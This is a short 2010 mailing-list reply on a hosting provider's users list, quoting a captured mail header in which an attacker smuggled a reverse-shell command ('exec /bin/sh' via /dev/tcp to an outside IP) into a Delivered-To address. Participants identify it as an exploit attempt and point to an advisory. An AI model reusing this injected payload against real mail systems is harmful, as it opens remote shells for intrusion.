Re: [bitfolk] Security - not just SSH

Top Page
Author: Andy Smith
Date:  
To: users
Subject: Re: [bitfolk] Security - not just SSH

Reply to this message
gpg: Signature made Thu Mar 18 13:53:02 2010 UTC using DSA key ID BF15490B
gpg: Good signature from "Andy Smith <andy@strugglers.net>"
gpg: aka "Andrew James Smith <andy@strugglers.net>"
gpg: aka "Andy Smith (UKUUG) <andy.smith@ukuug.org>"
gpg: aka "Andy Smith (BitFolk Ltd.) <andy@bitfolk.com>"
gpg: aka "Andy Smith (Linux User Groups UK) <andy@lug.org.uk>"
gpg: aka "Andy Smith (Cernio Technology Cooperative) <andy.smith@cernio.com>"
Hi,

On Thu, Mar 18, 2010 at 11:31:55AM +0000, David Leadbeater wrote:
> On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair Sherringham wrote:
> [..]
> > Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
>
> That would be someone trying to exploit this absolute failure:
> http://seclists.org/fulldisclosure/2010/Mar/140


omg, everything old is new again. :(

Cheers,
Andy

-- 
http://bitfolk.com/ -- No-nonsense VPS hosting